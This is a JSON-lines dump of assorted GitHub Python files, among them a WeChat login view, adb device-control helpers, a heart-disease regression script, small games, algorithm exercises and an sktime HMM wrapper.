\n if request.method == 'POST':\n res = {}\n \n code = request.POST.get('code')\n logging.info(code)\n openid, session_key = wechat.get_openid(code)\n token = wechat.get_token(openid + session_key)\n res['token'] = token\n\n now = datetime.datetime.utcnow()\n expire_time = now + datetime.timedelta(weeks = 1)\n # expire_time = now + datetime.timedelta(minutes = 60)\n print(expire_time)\n\n token_ttl = {}\n token_ttl['token'] = token\n token_ttl['openid'] = openid\n token_ttl['expire_time'] = expire_time\n\n MongoConn.update('token_ttl', {'openid' : openid}, {'$set' : {'expire_time' : expire_time, 'token' : token}}, True)\n\n # res['user_id'] = openid\n logging.info(token)\n return HttpResponse(json_util.dumps(res,ensure_ascii=False),content_type='application/x-www-form-urlencoded;charset=utf-8')\n ","repo_name":"liusongwei/facenote","sub_path":"facenote/login/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1676,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"8344026211","text":"# This launcher script is supposed to replace application calls and forward SIGTERM signals to them\nimport time\nimport signal\nimport os\nimport sys\nimport subprocess\nfrom multiprocessing import Process\n\nSTOP_TIMEOUT = 10\nstream = None\n\ndef signal_handler(sig, _frame):\n \"\"\"Handling the SIGTERM event\"\"\"\n print(f'Received signal {sig} - stopping gracefully in 30 seconds')\n os.killpg(os.getpgid(stream.pid), sig)\n count = STOP_TIMEOUT\n while count > 0:\n time.sleep(1)\n count -= 1\n print('Finished cleanup...')\n\n\ndef main():\n \"\"\"Opening subprocesses\"\"\"\n global stream\n stream = subprocess.Popen([\"/home/stream_c\"] + sys.argv[1:], preexec_fn=os.setsid)\n signal.signal(signal.SIGTERM, signal_handler)\n stream.wait()\n print(\"Finish execution...\")\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"raijenki/hpc-tests","sub_path":"stream/outdated/launcher_v1.py","file_name":"launcher_v1.py","file_ext":"py","file_size_in_byte":830,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"24410350","text":"# %%\nimport numpy as np\nimport pandas as pd\nimport dm6103 as dm\nimport statsmodels.api as sm # Importing statsmodels\nfrom statsmodels.formula.api import glm\n\n\ndf = pd.read_csv(\"heart_2020_new.csv\")\ndm.dfChk(df)\n\n# %%\n\n# create binary variable for Heart Disease \ndf['HeartDiseaseBin'] = 0\ndf.loc[ df['HeartDisease'] == \"Yes\", 'HeartDiseaseBin' ] = 1\n\nmodel_predictions = pd.DataFrame()\n\nprint(df.head())\nformula = 'HeartDiseaseBin ~ BMI + C(Smoking) + C(AlcoholDrinking) + C(Stroke) + \\\n PhysicalHealth + MentalHealth + C(DiffWalking) + C(Sex) + C(Race) + \\\n C(Diabetic) + C(PhysicalActivity) + C(GenHealth) + \\\n SleepTime + C(Asthma) + C(KidneyDisease) + C(SkinCancer) + AgeCont'\nheart_disease = glm(formula=formula, data=df, family=sm.families.Binomial())\n\nheart_disease_fit = heart_disease.fit()\nprint(heart_disease_fit.summary())\nmodel_predictions['heart_disease'] = heart_disease_fit.predict(df)\n\n# add row of binary actual outcomes for comparison\nmodel_predictions['actual'] = df['HeartDiseaseBin']\n\n# check it out \nmodel_predictions.head()\n\n\n# %%\nprint(-2*heart_disease_fit.llf)\n# Compare to the null deviance\nprint(heart_disease_fit.null_deviance)\n\n# %%\n# Try three different cut-off values at 0.3, 0.5, and 0.7. What are the a) Total accuracy of the model b) The precision of the model (average for 0 and 1), and c) the recall rate of the model (average for 0 and 1)\ncut_offs = [0.3, 0.5, 0.7]\n\nfor cut_off in cut_offs:\n # Compute class predictions\n model_predictions['heart_disease_' + str(cut_off)] = np.where(model_predictions['heart_disease'] > cut_off, 1, 0)\n #\n # Make a cross table\n confusion: pd.DataFrame = pd.crosstab(df.HeartDiseaseBin, model_predictions['heart_disease_' + str(cut_off)],\n rownames=['Actual'], colnames=['Predicted'],\n margins = True)\n\n # print(confusion)\n\n true_neg = confusion[0][0]\n false_pos = confusion[1][0]\n false_neg = confusion[0][1]\n true_pos = confusion[1][1]\n\n total = confusion['All']['All']\n accuracy = (confusion.iloc[1][1] + confusion.iloc[0][0]) / total\n precision = true_pos / (true_pos + false_pos)\n recall = true_pos / (true_pos + false_neg)\n f1 = 2 * (precision*recall) / (precision + recall)\n print(f'Cutoff = {cut_off}:')\n print('f1: ', round(f1, 3))\n print('precision: ', round(precision, 3))\n print('recall: ', round(recall, 3))\n print()\n\n# %%\n # now try all of the above with the balanced dataset \n\ndf2 = pd.read_csv(\"heart_2020_balanced.csv\")\ndm.dfChk(df2)\n\n# %%\n# create binary variable for Heart Disease \ndf2['HeartDiseaseBin'] = 0\ndf2.loc[ df2['HeartDisease'] == \"Yes\", 'HeartDiseaseBin' ] = 1\n\nmodel_predictions_bal = pd.DataFrame()\n\nprint(df2.head())\nformula = 'HeartDiseaseBin ~ BMI + C(Smoking) + C(AlcoholDrinking) + C(Stroke) + \\\n PhysicalHealth + MentalHealth + C(DiffWalking) + C(Sex) + C(Race) + \\\n C(Diabetic) + C(PhysicalActivity) + C(GenHealth) + \\\n SleepTime + C(Asthma) + C(KidneyDisease) + C(SkinCancer) + AgeCont'\nheart_disease_bal = glm(formula=formula, data=df2, family=sm.families.Binomial())\n\nheart_disease_bal_fit = heart_disease_bal.fit()\nprint(heart_disease_bal_fit.summary())\nmodel_predictions_bal['heart_disease'] = heart_disease_bal_fit.predict(df2)\n\n# add row of binary actual outcomes for comparison\nmodel_predictions_bal['actual'] = df2['HeartDiseaseBin']\n\n# check it out \nmodel_predictions_bal.head()\n\n\n# %%\nprint(-2*heart_disease_bal_fit.llf)\n# Compare to the null deviance\nprint(heart_disease_bal_fit.null_deviance)\n\n# %%\n# Try three different cut-off values at 0.3, 0.5, and 0.7. What are the a) Total accuracy of the model b) The precision of the model (average for 0 and 1), and c) the recall rate of the model (average for 0 and 1)\ncut_offs = [0.3, 0.5, 0.7]\n\nfor cut_off in cut_offs:\n # Compute class predictions\n model_predictions_bal['heart_disease_' + str(cut_off)] = np.where(model_predictions_bal['heart_disease'] > cut_off, 1, 0)\n #\n # Make a cross table\n confusion_bal: pd.DataFrame = pd.crosstab(df2.HeartDiseaseBin, model_predictions_bal['heart_disease_' + str(cut_off)],\n rownames=['Actual'], colnames=['Predicted'],\n margins = True)\n\n # print(confusion)\n\n true_neg_bal = confusion_bal[0][0]\n false_pos_bal = confusion_bal[1][0]\n false_neg_bal = confusion_bal[0][1]\n true_pos_bal = confusion_bal[1][1]\n\n total_bal = confusion_bal['All']['All']\n accuracy_bal = (confusion_bal.iloc[1][1] + confusion_bal.iloc[0][0]) / total_bal\n precision_bal = true_pos_bal / (true_pos_bal + false_pos_bal)\n recall_bal = true_pos_bal / (true_pos_bal + false_neg_bal)\n f1_bal = 2 * (precision_bal*recall_bal) / (precision_bal + recall_bal)\n print(f'Cutoff = {cut_off}:')\n print('f1: ', round(f1_bal, 3))\n print('precision: ', round(precision_bal, 3))\n print('recall: ', round(recall_bal, 3))\n print()\n\n#%%\n\n# Use some test data:\ndata = [['No', 'No', 'No', 0, 0, 'No', 'Female', 'White', 'No', 'Yes', 'Excellent', 8, 'No', 'No', 'No', 40, 20], ['No', 'No', 'No', 0, 0, 'No', 'Male', 'White', 'No', 'Yes', 'Excellent', 8, 'No', 'No', 'No', 40, 20], ['Yes', 'No', 'No', 0, 0, 'No', 'Female', 'White', 'No', 'Yes', 'Good', 8, 'No', 'No', 'No', 45, 23], ['Yes', 'Yes', 'No', 0, 0, 'No', 'Female', 'White', 'No', 'Yes', 'Poor', 8, 'No', 'No', 'No', 45, 23], ['Yes', 'No', 'Yes', 0, 0, 'No', 'Male', 'White', 'No', 'Yes', 'Fair', 5, 'No', 'No', 'No', 45, 23], ['No', 'No', 'No', 0, 0, 'No', 'Female', 'White', 'Yes', 'Yes', 'Excellent', 8, 'No', 'No', 'No', 40, 20], ['No', 'No', 'No', 0, 0, 'Yes', 'Male', 'White', 'Yes', 'No', 'Good', 8, 'No', 'No', 'No', 40, 20], ['No', 'No', 'No', 0, 0, 'Yes', 'Male', 'Asian', 'Yes', 'No', 'Good', 8, 'No', 'No', 'No', 40, 20], ['No', 'No', 'No', 0, 0, 'Yes', 'Male', 'Asian', 'Yes', 'No', 'Good', 8, 'No', 'Yes', 'Yes', 40, 20]] \n\ntestData = pd.DataFrame(data, columns = ['Smoking', 'AlcoholDrinking', 'Stroke', 'PhysicalHealth', 'MentalHealth', 'DiffWalking', 'Sex', 'Race', 'Diabetic', 'PhysicalActivity', 'GenHealth', 'SleepTime', 'Asthma', 'KidneyDisease', 'SkinCancer', 'AgeCont', 'BMI'])\ntestData['Prediction'] = heart_disease_bal_fit.predict(testData)\nprint(testData)\ntestData.to_csv('Test_Pred.csv')\n\n# %%\n","repo_name":"NickBenevento/DATS_6103_Project","sub_path":"regression.py","file_name":"regression.py","file_ext":"py","file_size_in_byte":6240,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"13123029097","text":"import turtle\r\nimport time\r\nfrom snake import Snake\r\nfrom food import Food\r\nfrom scoreboard import Scoreboard\r\nscreen = turtle.Screen()\r\nscreen.setup(width=600, height=600)\r\nscreen.bgcolor(\"black\")\r\nscreen.title(\"Snake Game\")\r\nscreen.tracer(0)\r\n\r\nserpiente = Snake(3)\r\nfood = Food()\r\nscoreboard = Scoreboard()\r\nscreen.listen()\r\nscreen.onkey(serpiente.up,\"Up\")\r\nscreen.onkey(serpiente.left,\"Left\")\r\nscreen.onkey(serpiente.right,\"Right\")\r\nscreen.onkey(serpiente.down,\"Down\")\r\n\r\ngame_is_on = True\r\nwhile game_is_on:\r\n screen.update()\r\n time.sleep(0.1)\r\n \r\n serpiente.snake_movement()\r\n\r\n if serpiente.head.distance(food) <= 15:\r\n food.refresh()\r\n scoreboard.increase_score()\r\n serpiente.extend()\r\n \r\n if serpiente.head.xcor() < -280 or serpiente.head.xcor() > 280 or serpiente.head.ycor() < -280 or serpiente.head.ycor() > 280:\r\n scoreboard.reset() \r\n serpiente.reset()\r\n \r\n for segmento in serpiente.new_segments[1:]:\r\n if segmento == serpiente.head:\r\n pass\r\n elif serpiente.head.distance(segmento) < 10:\r\n scoreboard.reset() \r\n serpiente.reset()\r\n \r\n \r\nscreen.exitonclick()\r\n\r\n\r\n","repo_name":"Camzzz5/SNAKE_GAME","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1209,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"29772751729","text":"\"\"\"Module with util functions to control Android devices.\"\"\"\n\nimport subprocess\nimport re\n\nfrom whichcraft import which\nimport click\n\ndef set_charging_enabled(enabled, serialno=None):\n \"\"\"Enable or disable charging the device.\"\"\"\n if serialno:\n command = (\n \"adb shell -s {serialno} dumpsys battery set ac {enabled};\"\n \"adb shell -s {serialno} dumpsys battery set usb {enabled};\"\n ).format(serialno=serialno, enabled=int(enabled))\n else:\n command = (\n \"adb shell dumpsys battery set ac {enabled};\"\n \"adb shell dumpsys battery set usb {enabled}\"\n ).format(enabled=int(enabled))\n\n subprocess.check_output(\n command,\n shell=True\n )\n\ndef prevent_device_from_sleep(enabled):\n \"\"\"Prevent device from sleep while usb connected.\"\"\"\n comand = \"adb shell svc power stayon {}\".format(\n {True: 'usb', False: 'false'}[enabled]\n )\n subprocess.check_output(\n comand,\n shell=True\n )\n\ndef is_screen_on():\n \"\"\"Check whether the screen is on.\"\"\"\n try:\n subprocess.check_output(\n \"adb shell dumpsys input_method | grep mInteractive=true\",\n shell=True\n )\n return True\n except subprocess.CalledProcessError:\n pass\n try:\n subprocess.check_output(\n 'adb shell dumpsys power | grep \"Display Power: state=ON\"',\n shell=True\n )\n return True\n except subprocess.CalledProcessError:\n pass\n return False\n\ndef is_locked():\n \"\"\"Check whether device is locked.\"\"\"\n try:\n output = subprocess.check_output(\n \"adb shell service call trust 7\",\n shell=True,\n universal_newlines=True\n )\n match = re.search(r\"Parcel\\(00000000 00000001\", output)\n return match is not None\n except subprocess.CalledProcessError as e:\n click.secho('Warning: {}'.format(e), fg='yellow')\n return True\n\ndef wakeup():\n \"\"\"Wake up device.\"\"\"\n if not is_screen_on():\n subprocess.check_output(\n \"adb shell input keyevent 26\",\n shell=True\n )\n\ndef unlock(pincode):\n \"\"\"Unlock device with the given PIN.\"\"\"\n wakeup()\n comand = (\n \"adb shell input keyevent 82\"\n \" && adb shell input text {}\"\n \" && adb shell input keyevent 66\"\n ).format(pincode)\n subprocess.check_output(\n comand,\n shell=True\n )\n\ndef install_apk(apk):\n \"\"\"Install apk.\n Accepts Downgrade, grants all requestd permissions,\n and reinstalls if app already exists.\n \"\"\"\n subprocess.check_output([\"adb\", \"install\", \"-d\", \"-g\", \"-r\", apk])\n\ndef check_adb():\n \"\"\"Check whether adb is available.\"\"\"\n return which(\"adb\") is not None\n\ndef is_android_device_available():\n \"\"\"Check whether there is at least an available android devices.\"\"\"\n if not check_adb():\n return False\n result = subprocess.check_output(\n \"adb devices\",\n shell=True,\n universal_newlines=True\n )\n devices = result.partition('\\n')[2].replace('\\n', '').split('\\tdevice')\n devices = [device for device in devices if len(device) > 2]\n if not devices:\n return False\n try:\n result = subprocess.check_output(\n \"adb shell getprop sys.boot_completed\",\n shell=True,\n universal_newlines=True).strip()\n return result == \"1\"\n except subprocess.CalledProcessError:\n return False\n\ndef get_device_model(serialno=None):\n \"\"\"Get the currently connected device model.\"\"\"\n if serialno:\n command = (\"adb shell -s {} \"\n \"getprop ro.product.model\").format(serialno)\n else:\n command = \"adb shell getprop ro.product.model\"\n try:\n return subprocess.check_output(\n command,\n shell=True,\n universal_newlines=True\n ).strip()\n except subprocess.CalledProcessError:\n return \"N/A\"\n\ndef connect_adb_through_wifi():\n \"\"\"Configure `adb` through a wifi connection.\"\"\"\n net_output = subprocess.check_output(\n \"adb shell ip -f inet addr show wlan0\",\n shell=True,\n universal_newlines=True\n )\n ip_address = re.search(r\"inet \\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\", net_output).group()[5:]\n subprocess.check_output(\n \"adb tcpip 5555\",\n shell=True\n )\n subprocess.check_output(\n \"adb connect {}\".format(ip_address),\n shell=True\n )\n\ndef reconnect_adb_through_usb():\n \"\"\"Connect adb back to USB while in wifi.\"\"\"\n try:\n subprocess.check_output(\n \"adb reconnect\",\n shell=True\n )\n except subprocess.CalledProcessError:\n pass\n\ndef get_package_from_apk(apk_path):\n aapt = \"$ANDROID_HOME/build-tools/27.0.0/aapt\"\n result = subprocess.check_output(\n aapt + \" dump badging {} | awk '/package/{{gsub(\\\"name=|'\\\"'\\\"'\\\",\\\"\\\"); print $2}}'\".format(apk_path),\n shell=True\n )\n return str(result.strip(), 'utf-8')\n\ndef get_instrumentation_for_app(app_pkg, test_pkg=\"\"):\n pattern = re.compile(\"instrumentation:(.*) \")\n output = subprocess.check_output(\n \"adb shell pm list instrumentation | grep -i {}\".format(app_pkg),\n shell=True\n )\n if type(output) is bytes:\n output = output.decode('utf-8')\n search = pattern.search(output)\n if search:\n return search.group(1)\n \n","repo_name":"TQRG/physalia","sub_path":"physalia/utils/android.py","file_name":"android.py","file_ext":"py","file_size_in_byte":5429,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"52"} +{"seq_id":"12818897787","text":"# 브루트 포스 풀이\n# class Solution:\n# def intersection(self, nums1, nums2):\n# ans = set()\n#\n# for num in nums1:\n# if num in nums2:\n# ans.add(num)\n#\n# return list(ans)\n\n# 이진탐색\n# class Solution:\n# def intersection(self, nums1, nums2):\n# def is_in(num):\n# s, e = 0, len(nums2)-1\n# while s <= e:\n# m = (s+e)//2\n# if nums2[m] == num:\n# return True\n# elif nums2[m] > num:\n# e = m-1\n# else:\n# s = m+1\n#\n# return False\n#\n# nums2.sort()\n#\n# ans = set()\n# for num in nums1:\n# if is_in(num):\n# ans.add(num)\n#\n# return ans\n\n# bisect 모듈\n# import bisect\n#\n# class Solution:\n# def intersection(self, nums1, nums2):\n# result = set()\n# nums2.sort()\n#\n# for n1 in nums1:\n# i2 = bisect.bisect_left(nums2, n1)\n# if len(nums2) > 0 and len(nums2) > i2 and n1 == nums2[i2]:\n# result.add(n1)\n#\n# return result\n\n\nclass Solution:\n def intersection(self, nums1, nums2):\n nums1.sort()\n nums2.sort()\n\n L, R = 0, 0\n\n ans = set()\n while L < len(nums1) and R < len(nums2):\n if nums1[L] == nums2[R]:\n ans.add(nums1[L])\n L, R = L+1, R+1\n else:\n if nums1[L] < nums2[R]:\n while L < len(nums1) and nums1[L] < nums2[R]:\n L += 1\n else:\n while R < len(nums2) and nums2[R] < nums1[L]:\n R += 1\n return ans\n\n\ns = Solution()\nnums1 = [1,2,2,1]\nnums2 = [2,2]\n# nums1 = [4,9,5]\n# nums2 = [9,4,9,8,4]\nprint(s.intersection(nums1, nums2))","repo_name":"galid1/Algorithm","sub_path":"python/leetcode/binary_search/349.Intercetion of Two Arrays.py","file_name":"349.Intercetion of Two Arrays.py","file_ext":"py","file_size_in_byte":1883,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"27362038375","text":"#\n#\n# 按字母 统计, 是否相符\n# 1 长度 相等 2 不矛盾\n#\n#\n\n\ndef my_print(x):\n # print(x)\n pass\n\n\ndef my_func_test():\n assert my_run(\"abba\", \"baaa\") == 'N'\n assert my_run(\"cccrocks\", \"socc*rk*\") == 'A'\n\n\ndef my_run(my_str1, my_str2):\n dic1 = {}\n dic2 = {'*': 0}\n\n for x in my_str1:\n dic1.setdefault(x, 0)\n dic1[x] = dic1[x] + 1\n\n for x in my_str2:\n dic2.setdefault(x, 0)\n dic2[x] = dic2[x] + 1\n\n my_print(dic1)\n my_print(dic2)\n for k, v in dic1.items():\n dic2.setdefault(k, 0)\n dic2[k] = dic2[k] - dic1[k]\n my_print(dic2)\n # 统计 是否 和 * 的数量一致\n total = 0\n\n for k, v in dic2.items():\n if k == '*':\n pass\n else:\n if dic2['*'] >= abs(v):\n dic2[k] = 0\n dic2['*'] = dic2['*'] - abs(v)\n # 移除 v =0 的 项\n my_print(\"after merge dic2={0}\".format(dic2))\n a_list = [k for k in dic2.items() if k[1] != 0]\n my_print(\"a_list={0}\".format(a_list))\n if len(a_list) == 0:\n return 'A'\n else:\n return 'N'\n\n\nmy_func_test()\n\n\ndef my_main():\n str1 = input()\n str2 = input()\n res = my_run(str1, str2)\n print(res)\n\n\nmy_main()\n","repo_name":"hzwuhao8/ccc","sub_path":"2016/s1.py","file_name":"s1.py","file_ext":"py","file_size_in_byte":1240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"3391112045","text":"import logging\nimport unittest\n\nfrom modelforge.logs import setup_logging\nfrom modelforge.tests.capture import captured_output\n\n\nclass LogTests(unittest.TestCase):\n def test_setup(self):\n with captured_output() as (out, err, log):\n root = logging.getLogger()\n if len(root.handlers) == 1:\n root.handlers.insert(0, logging.StreamHandler())\n setup_logging(\"INFO\")\n logger = logging.getLogger(\"test\")\n logger.info(\"success\")\n self.assertIn(\"test\", err.getvalue())\n self.assertIn(\"success\", err.getvalue())\n self.assertIn(\"1;36\", err.getvalue())\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"adolfoeliazat/modelforge","sub_path":"modelforge/tests/test_logs.py","file_name":"test_logs.py","file_ext":"py","file_size_in_byte":691,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"52"} +{"seq_id":"72733604006","text":"#!/usr/bin/env python3\nimport sys\nimport gzip\n\ninput_file = sys.argv[1]\ninput_handle = gzip.open(input_file)\noutput_handle = sys.stdout\n\ncount_dict = {}\nwhile True:\n lines = []\n for i in range(4):\n lines.append(input_handle.readline().decode())\n try:\n bc = lines[0].split('\\t')[3]\n except IndexError:\n break\n try:\n count_dict[bc] += 1\n except KeyError:\n count_dict[bc] = 1\n if count_dict[bc] <= 100000:\n [output_handle.write(l) for l in (lines)]","repo_name":"thomasvangurp/epiGBS","sub_path":"de_novo_reference_creation/subsample.py","file_name":"subsample.py","file_ext":"py","file_size_in_byte":508,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"52"} +{"seq_id":"33996681190","text":"\"\"\"Hidden Markov Model based annotation from hmmlearn.\n\nThis code provides a base interface template for models\nfrom hmmlearn for using that library for annotation of time series.\n\nPlease see the original library\n(https://github.com/hmmlearn/hmmlearn/blob/main/lib/hmmlearn/hmm.py)\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\n\nfrom sktime.annotation.base import BaseSeriesAnnotator\n\n__author__ = [\"miraep8\"]\n__all__ = [\"BaseHMMLearn\"]\n\n\nclass BaseHMMLearn(BaseSeriesAnnotator):\n \"\"\"Base class for all HMM wrappers, handles required overlap between packages.\"\"\"\n\n _tags = {\n \"univariate-only\": True,\n \"fit_is_empty\": True,\n \"python_dependencies\": \"hmmlearn\",\n } # for unit test cases\n _hmm_estimator = None\n\n def __init__(self):\n super().__init__()\n\n @staticmethod\n def _fix_input(X):\n \"\"\"Convert input X into the format needed.\n\n Parameters\n ----------\n X : arraylike (1D np.ndarray or pd.series), shape = [num_observations]\n Observations to apply labels to.\n\n Returns\n -------\n X : arraylike (2D np.ndarray), shape = [1, num_observations]\n Observations to apply labels to.\n series: bool - whether or not X was originally a pd.Series\n index: pd.index, the index if X was originally a series object.\n \"\"\"\n series = isinstance(X, pd.Series)\n index = None\n if series:\n index = X.index\n X = (X.to_numpy()).reshape((-1, 1))\n if isinstance(X, np.ndarray) and X.ndim == 1:\n X = X.reshape((-1, 1))\n return X, series, index\n\n def _fit(self, X, Y=None):\n \"\"\"Ensure X is correct type, then fit wrapped estimator.\n\n Parameters\n ----------\n X : arraylike (1D np.ndarray or pd.series), shape = [num_observations]\n Observations to apply labels to.\n\n Returns\n -------\n self :\n Reference to self.\n \"\"\"\n X, _, _ = self._fix_input(X)\n self._hmm_estimator = self._hmm_estimator.fit(X)\n return self\n\n def _predict(self, X):\n \"\"\"Ensure the input type is correct, then predict using wrapped estimator.\n\n Parameters\n ----------\n X : 1D np.array, shape = [num_observations]\n Observations to apply labels to.\n\n Returns\n -------\n annotated_x : array-like, shape = [num_observations]\n Array of predicted class labels, same size as input.\n \"\"\"\n X, series, index = self._fix_input(X)\n X_prime = self._hmm_estimator.predict(X)\n if series:\n X_prime = pd.Series(X_prime, index=index)\n return X_prime\n\n def sample(self, n_samples=1, random_state=None, currstate=None):\n \"\"\"Interface class which allows users to sample from their HMM.\"\"\"\n return self._hmm_estimator.sample(n_samples, random_state, currstate)\n","repo_name":"sktime/sktime","sub_path":"sktime/annotation/hmm_learn/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":2923,"program_lang":"python","lang":"en","doc_type":"code","stars":7028,"dataset":"github-code","pt":"52"} +{"seq_id":"21926699790","text":"def main():\n user_name = input('\\nHello, and welcome to the game. Prepare for an adventure!\\nLoading game...\\nPlease enter your name:\\n')\n user_name = user_name[1:] + user_name[0] + 'ay'\n print(\"\\nHello \" + user_name + \"!\")\n start_scene()\n return\n\ndef start_scene():\n print(\"You are a student at UC Berkeley, and you have just been assigned a new CS project.\")\n choices = [\"Start now.\", \"Start later.\"]\n choice = user_decide(choices)\n if choice == 0:\n squirrel()\n if choice == 1:\n party()\n\ndef squirrel():\n print(\"Great! You are on your way to Soda when sUdDenly a wild squiRrel appears!!!\")\n choices = ['Feed squirrel', 'Kick squirrel.']\n choice = user_decide(choices)\n if choice == 0:\n feed_squirrel()\n if choice == 1:\n kick_squirrel() \n \ndef party():\n print(\"Instead of working you decide to go to a party!!\")\n choices = [\"It's a study party for a class more important than CS...\", 'Turnt up!!']\n choice = user_decide(choices)\n if choice == 0:\n study_party()\n if choice == 1:\n turn_up()\n\ndef feed_squirrel():\n print(\"That squirrel bites you!!\")\n choices = [\"Bite it back!\", \"Head over to the Tang Center because you forgot to waive SHIP and your health is your number one priority.\"]\n choice = user_decide(choices)\n if choice == 0:\n bite_back()\n if choice == 1:\n tang()\n\ndef kick_squirrel():\n print(\"The squirrel thinks you're rood.\")\n choices = ['Continue to Soda.', 'All this squirrel kicking makes you tired. You head home for a nap.']\n choice = user_decide(choices)\n if choice == 0:\n go_to_soda()\n nap()\n\ndef study_party():\n print(\"What?? A class more important than CS?? HAHAHA\")\n choices = ['Yeah man I was jk!', \"I'm delirious and I choose to stay at the study party.\"]\n choice = user_decide(choices)\n if choice == 0:\n jk()\n if choice == 1:\n stay()\n\ndef turn_up():\n print(\"Turn up for WHATT?\")\n print(\"Not your grades!! You failed this class.\")\n user_death()\n\ndef bite_back():\n print(\"Yumm... squirrel!\")\n print(\"You die of salmonella.\")\n user_death()\n\ndef tang():\n print(\"You decide that while you're here, you're going to try to appeal your waiver. You are denied again!\")\n choices = ['Flip a table.', 'Calmly accept your fate.']\n choice = user_decide(choices)\n if choice == 0:\n table()\n if choice == 1:\n fate()\n\ndef jk():\n print(\"You think this is a joke?!\")\n print(\"Ded.\")\n user_death()\n\ndef stay():\n print(\"You fail CS because you're too busy study partying.\")\n print(\"Ded.\")\n user_death()\n\ndef table():\n print(\"You are kicked out of Tang and die of infection.\")\n print(\"Ded.\")\n user_death()\n\ndef fate():\n print(\"The table flips over anyway. You are kicked out of Tang for disturbing the peace.\")\n print(\"You leave in pieces.\")\n user_death()\n\ndef go_to_soda():\n print(\"You thought it was due at midnight today. But it was really due midnight yesterday.\")\n print(\"Cry.\")\n print(\"Cry more.\")\n user_death()\n\ndef nap():\n print(\"You oversleep and miss the deadline!\")\n print(\"Cry.\")\n print(\"Creys.\")\n user_death() \n\ndef user_death():\n print(\"You have died and failed. Goodbye.\")\n return\n\ndef user_decide(choices):\n list_choices(choices)\n choice = -1\n while ((choice != 0) and (choice != 1)):\n choice = input(\"\\nWhat do you decide to do? Enter the number of your decision:\\n\")\n choice = int(choice) - 1\n return choice\n\ndef list_choices(choices):\n print(\"1) \" + choices[0])\n print(\"2) \" + choices[1])\n\ndef user_success():\n print(\"You have beat the game! Congratulations! Enjoy the rest of your day.\")\n\nmain()\n","repo_name":"jshoe/introhack","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3754,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"29661428948","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n\n\nimport pygame\nfrom pygame.sprite import Sprite\n\n\nclass Bullet(Sprite):\n \"\"\"管理子弹发射\"\"\"\n\n def __init__(self, ai_settings, screen, ship):\n \"\"\"在飞船的位置创建子弹\"\"\"\n super(Bullet, self).__init__()\n self.screen = screen\n\n # 在(0,0)出创建子弹,在设置正确的位置\n self.rect = pygame.Rect(0, 0, ai_settings.bullet_width, ai_settings.bullet_height)\n self.rect.centerx = ship.rect.centerx\n self.rect.top = ship.rect.top\n\n # 用小数表示子弹的位置\n self.y = float(self.rect.y)\n\n self.color = ai_settings.bullet_color\n self.speed_factor = ai_settings.bullet_speed_factor\n\n def update(self):\n \"\"\"向上移动子弹\"\"\"\n # 更新子弹位置的小数值\n self.y -= self.speed_factor\n # 更新子弹rect的位置\n self.rect.y = self.y\n\n def draw_bullet(self):\n \"\"\"绘制子弹\"\"\"\n pygame.draw.rect(self.screen, self.color, self.rect)","repo_name":"wjainiya/Alien_game1","sub_path":"bullet.py","file_name":"bullet.py","file_ext":"py","file_size_in_byte":1047,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"16604101701","text":"from math import fsum\nfrom typing import Callable,List,Set\nfrom functools import wraps\nfrom time import perf_counter\ndef stop_watch(func:Callable) ->Callable:\n times=[]\n @wraps(func)\n def inner(*args,**kwargs):\n for _ in range(10):\n start_time = perf_counter()\n func(*args,**kwargs)\n end_time = perf_counter()\n elapsed = end_time - start_time\n times.append(elapsed)\n average_time = fsum(times) / len(times)\n print(f\"Average elapsed time for executing {func.__name__} is {average_time:.5f}\")\n return inner\n@stop_watch\ndef make_list(size:int) -> List:\n return list(range(size))\n\n@stop_watch\ndef make_set(size:int) -> Set:\n return set(range(size))\n\nmake_list(100_000)\nmake_set(100_000)\n'''\ndef example_decorator(func: Callable) -> Callable:\n @wraps(func)\n def inner(*args, **kwargs):\n start_time = perf_counter()\n func(*args, **kwargs)\n end_time = perf_counter()\n print(f\"For {func.__name__} code execution time was around {end_time - start_time:.5f} seconds\")\n return inner\n@example_decorator\ndef add(*args, **kwargs):\n print(sum(*args, **kwargs))\n\n@example_decorator\ndef add(*args, **kwargs):\n print(sum(*args, **kwargs))\n\nadd([1, 5, 7, 4, 8])\nadd([200, 345])\nprint(add) # with wraps name get reserved\n\n# can find sum of any number of values using decorators\n# print(add) without wraps gives .inner at 0x03130780>\nprint(\"And the sum is:\", func(*args,**kwargs))\ndef add(*args,**kwargs):return sum(*args,**kwargs) \ncan be used to print the sum but we can directly use the value obtained from inner using return inside it\n\ndef example_decorator(func: Callable) -> Callable:\n def inner(): #without arguments\n pass\n return inner\n@example_decorator\ndef greeting():\n pass\ngreeting()\n# print(example_decorator(greeting)) gives .inner at 0x03130780>\n# print(greet) gives the reference obj of this func instead just call greet()\n# which takes up greeting fn and pass it to our decorator\n# greet = example_decorator(greeting) greet() This approach bcms clumsy to use \nso, we can use @decorator_name on the func which we want to call inside our decorator 